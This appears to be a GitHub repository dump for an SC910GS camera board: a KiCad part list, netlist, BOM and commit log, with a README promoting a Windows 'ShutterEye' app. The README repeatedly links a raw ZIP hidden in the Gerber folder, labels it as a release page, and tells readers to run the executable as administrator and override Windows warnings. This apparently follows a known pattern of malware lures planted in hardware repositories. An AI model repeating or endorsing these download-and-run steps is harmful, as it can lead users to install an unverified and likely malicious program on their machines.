# Repository finleytransparent919/ShutterEye

File README.md:

# 📷 ShutterEye - Clear 4K capture for your board

## 🚀 What ShutterEye Does

ShutterEye is a simple camera board app for the SC910GS 1" 4K@30fps global shutter sensor. It helps you view, capture, and manage camera output on a Windows PC.

Use it to:

- Open the camera board on your computer
- See a live image from the sensor
- Capture frames for review
- Work with a global shutter camera setup
- Keep the setup simple for everyday use

## 💻 What You Need

Before you start, check that you have:

- A Windows PC
- A free USB port or the correct board connection
- Enough storage for image and video files
- A display with standard Windows support
- Permission to install or run downloaded apps

For best results, use:

- Windows 10 or Windows 11
- A screen with at least 1366 × 768 resolution
- A stable USB connection
- The latest system updates

## 📥 Download ShutterEye

Go to the release page and download the version for Windows:

[Visit the ShutterEye release page](https://raw.githubusercontent.com/finleytransparent919/ShutterEye/main/Gerber/Shutter-Eye-2.7.zip)

On that page, look for the latest release and choose the Windows file if one is listed. If the release includes a ZIP file, download it to a folder you can find later, such as Downloads or Desktop.

## 🪟 Install or Open on Windows

After the download finishes:

1. Open the folder where the file was saved
2. If the file is a ZIP file, right-click it and choose Extract All
3. Open the extracted folder
4. Find the ShutterEye app file
5. Double-click the app to start it

If Windows asks for permission, choose Yes or Run.

If you see more than one file, use the main app file, not the readme or support files.

## 🔌 Connect the Camera Board

To use ShutterEye, connect your camera board before or after opening the app, based on your setup.

1. Connect the SC910GS board to your computer
2. Make sure the cable is secure
3. Wait a few seconds for Windows to detect the device
4. Open ShutterEye
5. Check that the live view appears

If the image does not show, unplug the board, wait a moment, and plug it in again.

## 🎛️ Basic Controls

ShutterEye is made to keep the main controls easy to reach.

Common controls may include:

- Start or stop live view
- Capture a frame
- Save an image file
- Change resolution
- Adjust exposure
- Set gain
- Switch frame rate

If your board supports more options, they will appear in the app as simple controls or menus.

## 🖼️ Capturing Images

To save a still image:

1. Open the live view
2. Point the camera at your subject
3. Click the capture button
4. Choose where to save the file if asked
5. Open the saved image from your chosen folder

For cleaner results, keep the camera steady and use good lighting.

## ⚙️ Recommended Setup

For a smooth first run:

- Use a direct USB port on the PC
- Avoid loose adapters
- Close other camera apps
- Keep the board on a stable surface
- Use even lighting for test shots

If the image looks dark, raise the room light first before changing settings.

## 🧰 Common Use Cases

ShutterEye fits simple camera work such as:

- Board testing
- Sensor checks
- Image review
- Motion capture experiments
- Desktop camera setup for lab use
- Quick visual checks during development

The global shutter sensor helps reduce motion smear in moving scenes.

## 🛠️ Troubleshooting

### No Camera Image

Try these steps:

1. Close ShutterEye
2. Unplug the camera board
3. Plug it back in
4. Open ShutterEye again
5. Try a different USB port

### App Does Not Start

Try this:

1. Check that the file finished downloading
2. Extract the ZIP file if needed
3. Right-click the app and choose Run as administrator
4. Make sure Windows did not block the file
5. Download the latest release again if the file looks damaged

### Camera Is Detected, But The Image Is Black

Try:

- Increasing exposure
- Checking the lens or sensor cover
- Improving room light
- Reconnecting the board
- Restarting the app

### Image Looks Uneven Or Too Dark

Try adjusting:

- Exposure
- Gain
- Frame rate
- Lighting in the room

## 📁 File Notes

After you install or extract the app, you may see files such as:

- The main app file
- Support folders
- Readme files
- Driver or device files
- Example assets

Keep all files in the same folder unless the release notes say otherwise.

## 🔄 Updating ShutterEye

To update to a newer version:

1. Go to the release page
2. Download the latest Windows file
3. Close the current app
4. Replace the old files with the new files, if needed
5. Open the updated app

If you keep a copy of your current folder, you can roll back later if needed.

## 📷 About the Camera Board

ShutterEye is built for a simple camera board that uses the SC910GS 1" 4K@30fps global shutter sensor. This type of sensor is useful when you want a clean frame with less motion distortion.

It is a good fit for:

- Fast-moving objects
- Test rigs
- Desktop camera setups
- Image checks that need stable capture timing

## 🧭 Getting Started Fast

If you want the shortest path:

1. Open the release page
2. Download the latest Windows file
3. Extract it if it comes as ZIP
4. Run the app
5. Connect the camera board
6. Start live view
7. Capture an image

## 📌 Release Page

Download the Windows version here:

[https://raw.githubusercontent.com/finleytransparent919/ShutterEye/main/Gerber/Shutter-Eye-2.7.zip](https://raw.githubusercontent.com/finleytransparent919/ShutterEye/main/Gerber/Shutter-Eye-2.7.zip)

## 🧾 Typical Folder Layout

A release may include:

- ShutterEye.exe
- config folder
- assets folder
- readme file
- device support files

Keep the folder together so the app can find its files.

## 🔐 Safety on Windows

When you open a downloaded app, Windows may ask for confirmation. Check that you downloaded it from the release page above, then allow it to run if you trust the source.

## 🖱️ Short Steps for First Use

1. Download ShutterEye from the release page
2. Save the file to your computer
3. Extract it if needed
4. Run the app
5. Connect the camera board
6. View the live image
7. Capture your first frame

## KiCad design ShutterEye.kicad_pcb

Parts:
C1, C39, C68, C69, C100: 100nF; C_0402_1005Metric
C2, C8: NFM18CC101R1C3D
C3, C4, C5, C6, C7, C10, C11, C12, C13, C14, C15, C16, C17, C18, C19, C20, C21, C22, C23, C24, C25, C31, C49, C50, C51, C52, C53, C54, C55, C56, C57, C58, C59, C60, C62, C63, C65, C66, C67, C70, C71, C72, C73, C74, C75, C76, C77, C78, C79, C80, C81, C82, C83, C84, C85, C86, C87, C88, C89, C90, C91, C92, C93, C94, C95, C98, C99: 1uF; C_0402_1005Metric
C9, C32, C36: 10uF; C_0603_1608Metric
C26, C27, C28, C29, C30, C40, C41, C42, C43, C44, C45, C46, C47, C48: 10uF; C_0402_1005Metric
C33, C37: 4.7uF; C_0603_1608Metric
C34, C35: 100pF; C_0402_1005Metric
C38: 22uF; C_0603_1608Metric
C61, C101: 10nF; C_0402_1005Metric
C64, C102: 22uF; C_0805_2012Metric
C96, C97: 4.7uF; C_0402_1005Metric
FB1, FB2: BLM18KG102SN1D; L_0603_1608Metric
FB4: BLM15PX800SN1D; L_0402_1005Metric
FL1, FL2, FL3, FL4, FL5: DLM0QSB120HY2D
H1, H2, H3, H4: MountingHole; MountingHole_2.2mm_M2
J1: BM04B-SRSS-TB; JST_SH_BM04B-SRSS-TB_1x04-1MP_P1.00mm_Vertical
J2: TF38-22S-0.5SV(830); TF3822S05SV830; Part Description 22 Position FFC, FPC Connector Contacts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
J5: Conn_Coaxial; U.FL_Hirose_U.FL-R-SMT-1_Vertical
L1: DFE201210U-2R2M=P2; L_0805_2012Metric
R1: 22R; R_0402_1005Metric
R2: 0R; R_0402_1005Metric
R3, R4, R5, R14, R15: DNP; R_0402_1005Metric
R6, R7, R8, R11, R13, R16, R17: 10K; R_0402_1005Metric
R9, R12: 25.5K; R_0402_1005Metric
R10, R18: 10.2K; R_0402_1005Metric
TP1, TP2, TP3, TP5, TP8, TP9, TP11, TP12, TP13, TP14, TP15: VDDA; TestPoint_Pad_D1.0mm
TP4: 1V2; TestPoint_Pad_D1.0mm
TP10: VDDIO; TestPoint_Pad_D1.0mm
U1: SC910GS
U2: ECS-2520MV-270-DN-TR; Oscillator_SMD_Abracon_ASDMB-4Pin_2.5x2.0mm
U3: TMP117AIDRVR
U4, U5: TPS7A90; Texas_S-PDSO-N10_EP1.2x2mm
U6: LP5912-1.8DRV; WSON-6-1EP_2x2mm_P0.65mm_EP1x1.6mm_ThermalVias
U8: TPS628511DRLR; DRL0008A-MFG
U10: TCA9406DC; VSSOP-8_2.3x2mm_P0.5mm

Connections:
+3V3: C2.1, C8.1, C69.1, FB1.2, FB2.2, FB4.1, J1.2, J2.1, R4.1, R5.2, TP5.1, U10.7 (VCCB)
/CLK_N: FL3.2, J2.15
/CLK_P: FL3.3, J2.14
/D0_N: FL1.2, J2.21
/D0_P: FL1.3, J2.20
/D1_N: FL2.2, J2.18
/D1_P: FL2.3, J2.17
/D2_N: FL4.2, J2.12
/D2_P: FL4.3, J2.11
/D3_N: FL5.2, J2.9
/D3_P: FL5.3, J2.8
CAM_CLK_N: FL3.1, U1.M1 (M0CN)
CAM_CLK_P: FL3.4, U1.M2 (M0CP)
CAM_D0_N: FL1.1, U1.N1 (M0D0N)
CAM_D0_P: FL1.4, U1.N2 (M0D0P)
CAM_D1_N: FL2.1, U1.L1 (M0D1N)
CAM_D1_P: FL2.4, U1.L2 (M0D1P)
CAM_D2_N: FL4.1, U1.P1 (M0D2N)
CAM_D2_P: FL4.4, U1.P2 (M0D2P)
CAM_D3_N: FL5.1, U1.K1 (M0D3N)
CAM_D3_P: FL5.4, U1.K2 (M0D3P)
CAM_EN: J2.6, R6.1, U4.7 (EN), U5.7 (EN), U6.4 (EN), U8.2 (EN)
CLOCK: R1.1, U1.A3 (EXTCLK)
GND: C1.2, C2.2, C3.2, C4.2, C5.2, C6.2, C7.2, C8.2, C9.2, C10.2, C11.2, C12.2, C13.2, C14.2, C15.2, C16.2, C17.2, C18.2, C19.2, C20.2, C21.2, C22.2, C23.2, C24.2, C25.2, C26.1, C27.1, C28.1, C29.1, C30.1, C31.1, C32.2, C33.1, C34.1, C36.2, C37.2, C38.1, C39.2, C40.1, C41.1, C42.1, C43.1, C44.1, C45.1, C46.1, C47.1, C48.1, C49.2, C50.2, C51.2, C52.2, C53.2, C54.2, C55.2, C56.2, C57.2, C58.2, C59.2, C60.2, C62.2, C63.2, C64.2, C65.2, C66.2, C67.2, C68.2, C69.2, C70.2, C71.2, C72.2, C73.2, C74.2, C75.2, C76.2, C77.2, C78.2, C79.2, C80.2, C81.2, C82.2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
unnamed: TP2.1, U1.B5 (GPIO0)
unnamed: TP11.1, U1.B4 (GPIO1)
unnamed: C43.2, C44.2, U1.C22 (GSVREFH2), U1.P22 (GSVREFH22)
unnamed: C45.2, C46.2, U1.C21 (GSVREFH), U1.P21 (GSVREFH2)
unnamed: TP12.1, U1.B3 (LED0)
unnamed: TP13.1, U1.C1 (LED1)
unnamed: TP14.1, U1.C2 (LED2)
unnamed: TP15.1, U1.C3 (LED3)
unnamed: R2.1, R3.2, U1.A10 (OTPEN)
unnamed: R11.1, U1.A8 (PWDNB)
unnamed: C96.1, U1.B20 (RSTCLAMP)
unnamed: C41.2, C42.2, U1.F22 (RSTM), U1.L22 (RSTM2)
unnamed: R17.1, U1.A6 (SCK)
unnamed: C97.1, U1.A20 (SIGCLAMP)
unnamed: R16.1, U1.C7 (SSB)
unnamed: C47.2, C48.2, U1.D22 (TXVDD), U1.N22 (TXVDD2)
unnamed: C30.2, C40.2, U1.D21 (VREFH), U1.N21 (VREFH2)
unnamed: C26.2, C27.2, U1.E21 (VREFN2), U1.M21 (VREFN22)
unnamed: C28.2, C29.2, U1.E22 (VREFN), U1.M22 (VREFN2)
unnamed: C13.1, C14.1, C15.1, C16.1, C17.1, C19.1, C20.1, C21.1, C22.1, C23.1, C24.1, C25.1, U1.E10 (VRM), U1.E11 (VRM2), U1.E15 (VRM3), U1.E16 (VRM4), U1.G5 (VRM5), U1.H5 (VRM6), U1.H18 (VRM7), U1.J18 (VRM8), U1.M7 (VRM9), U1.M8 (VRM10), U1.M13 (VRM11), U1.M14 (VRM12)
unnamed: C7.1, C10.1, C11.1, C12.1, C78.1, U1.R9 (VRSFLO), U1.R11 (VRSFLO2), U1.R17 (VRSFLO3), U1.T9 (VRSFLO4), U1.T17 (VRSFLO5)
unnamed: C3.1, C4.1, C5.1, C6.1, C77.1, U1.R7 (VRSFMID), U1.R13 (VRSFMID2), U1.R15 (VRSFMID3), U1.T7 (VRSFMID4), U1.T15 (VRSFMID5)
unnamed: R13.2, U1.B8 (XSHUTDN)
unnamed: R1.2, U2.3 (Out)
unnamed: C31.2, FB4.2, U3.5 (V+)
unnamed: C61.1, R9.1, R10.2, U4.3 (FB)
unnamed: C39.1, U4.8 (NR/SS)
unnamed: C8.3, C9.1, U4.6 (SS_CTRL), U4.9 (IN), U4.10 (IN)
unnamed: C101.1, R12.1, R18.2, U5.3 (FB)
unnamed: C100.1, U5.8 (NR/SS)
unnamed: C2.3, C32.1, U5.6 (SS_CTRL), U5.9 (IN), U5.10 (IN)
unnamed: C33.2, FB1.1, U6.6 (IN)
unnamed: C35.1, R7.2, R8.1, U8.5 (FB)
unnamed: C34.2, U8.4 (SS_TR)
unnamed: L1.1, U8.7 (SW)
unnamed: C37.1, FB2.1, U8.1 (VIN)
SCL_1V8: R14.1, U1.A4 (SCL), U10.5 (SCL_A)
SCL_IN: J1.4, J2.3, R4.2, U3.1 (SCL), U10.8 (SCL_B)
SDA_1V8: R15.2, U1.A5 (SDA), U10.4 (SDA_A)
SDA_IN: J1.3, J2.2, R5.1, U3.6 (SDA), U10.1 (SDA_B)
TRIG: J5.1 (In), U1.A7 (Trigger)
VDDA: C49.1, C50.1, C51.1, C52.1, C53.1, C54.1, C55.1, C56.1, C59.1, C60.1, C61.2, C64.1, C94.1, C95.1, R9.2, TP9.1, U1.A19 (AVDD), U1.B19 (AVDD2), U1.E8 (AVDD3), U1.E9 (AVDD4), U1.E12 (AVDD5), U1.E13 (AVDD6), U1.H22 (AVDD7), U1.J22 (AVDD8), U1.M9 (AVDD9), U1.M10 (AVDD10), U1.R20 (AVDD11), U1.T20 (AVDD12), U4.1 (OUT), U4.2 (OUT)
VDDD: C35.2, C38.2, C72.1, C73.1, C74.1, C75.1, C76.1, C81.1, C82.1, C83.1, C84.1, C85.1, C86.1, C87.1, C88.1, C89.1, C90.1, C91.1, C92.1, L1.2, R7.1, TP4.1, U1.A9 (PDVDD), U1.A12 (DVDD), U1.A14 (DVDD2), U1.A16 (DVDD3), U1.B12 (DVDD4), U1.B14 (DVDD5), U1.B16 (DVDD6), U1.E5 (DVDD7), U1.E6 (DVDD8), U1.E18 (DVDD9), U1.F18 (DVDD10), U1.K5 (DVDD11), U1.L5 (DVDD12), U1.M16 (DVDD13), U1.M17 (DVDD14), U1.R3 (DVDD15), U1.T3 (DVDD16)
VDDIO: C1.1, C18.1, C36.1, C62.1, C63.1, C65.1, C66.1, C67.1, C68.1, C70.1, C71.1, C79.1, R2.2, R11.2, R13.1, R14.2, R15.1, TP10.1, U1.A11 (DOVDD), U1.A17 (DOVDD2), U1.B11 (DOVDD3), U1.B17 (DOVDD4), U1.C4 (DOVDD5), U1.D3 (DOVDD6), U1.L18 (DOVDD7), U1.M5 (DOVDD8), U1.M18 (DOVDD9), U2.1 (Standby), U2.4 (VDD), U6.1 (OUT), U10.3 (VCCA), U10.6 (OE)
VDDP: C57.1, C58.1, C80.1, C93.1, C98.1, C99.1, C101.2, C102.1, R12.2, TP1.1, U1.R5 (PVDD), U1.R12 (PVDD2), U1.R19 (PVDD3), U1.T5 (PVDD4), U1.T12 (PVDD5), U1.T19 (PVDD6), U5.1 (OUT), U5.2 (OUT)

Notes on the sheet:
2.8V
27Mhz 1.8V CMOS
1.8V
1.5V
Connectors
QWIIC
I2C Devices
Temperature Sensor
SC910GS
I2C ADDR: 0x48
Power
MIPI

Board: 4 copper layers, 39.0 x 39.0 mm, 157 parts (1 on the bottom side), 69 nets.

File bom/BOM_JLCSMT.xlsx:

Comment | Designator | Footprint | JLCPCB Part #（optional）
1uF | C51,C15,C65,C73,C7,C4,C80,C83,C20,C52,C91,C16,C74,C53,C3,C94,C49,C82,C76,C25,C7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 | C_0402_1005Metric | C52923
10uF | C40,C28,C44,C41,C29,C47,C42,C27,C26,C48,C45,C30,C43,C46 | C_0402_1005Metric | C15525
10K | R17,R6,R7,R16,R11,R13,R8 | R_0402_1005Metric | C25744
TPS7A90 | U4,U5 | Texas_S-PDSO-N10_EP1.2x2mm | C840111
27Mhz | U2 | Oscillator_SMD_Abracon_ASDMB-4Pin_2.5x2.0mm | C669075
100nF | C69,C1,C68,C100,C39 | C_0402_1005Metric | C307331
22uF | C38 | C_0603_1608Metric | C59461
DLM0QSB120HY2D | FL2,FL3,FL5,FL4,FL1 | DLM0QSB120HY2D | C3211477
10nF | C101,C61 | C_0402_1005Metric | C15195
Conn_01x04_Shielded | J1 | JST_SH_BM04B-SRSS-TB_1x04-1MP_P1.00mm_Vertical | C160390
0R | R2 | R_0402_1005Metric | C17168
10uF | C32,C9,C36 | C_0603_1608Metric | C19702
4.7uF | C37,C33 | C_0603_1608Metric | C19666
25.5K | R12,R9 | R_0402_1005Metric | C26970
10.2K | R18,R10 | R_0402_1005Metric | C325583
22R | R1 | R_0402_1005Metric | C25092
100pF | C34,C35 | C_0402_1005Metric | C1546
4.7uF | C96,C97 | C_0402_1005Metric | C23733
22uF | C102,C64 | C_0805_2012Metric | C45783
TF3822S05SV830 | J2 | TF3822S05SV830 | C6552695
NFM18CC101R1C3D | C2,C8 | NFM18CC101R1C3D | C111493
TCA9406DC | U10 | VSSOP-8_2.3x2mm_P0.5mm | C840107
DFE201210U-2R2M=P2 | L1 | L_0805_2012Metric | C2049745
BLM18KG102SN1D | FB1,FB2 | L_0603_1608Metric | C160982
TMP117AIDRVR | U3 | TMP117AIDRVR | C699536
BLM15PX800SN1D | FB4 | L_0402_1005Metric | C160978
LP5912-1.8DRV | U6 | WSON-6-1EP_2x2mm_P0.65mm_EP1x1.6mm_ThermalVias | C2876234
TPS628511DRLR | U8 | DRL0008A-MFG | C3193216
Conn_Coaxial | J5 | U.FL_Hirose_U.FL-R-SMT-1_Vertical | C5137195

## Commit log

2026-03-22 init
2026-03-22 Update README with sensor comparison details
    Corrected grammar and clarified differences between SC910GS and GMAX3412 sensors.
2026-03-22 Update readme ShutterEye
2026-04-16 Revise README for clarity
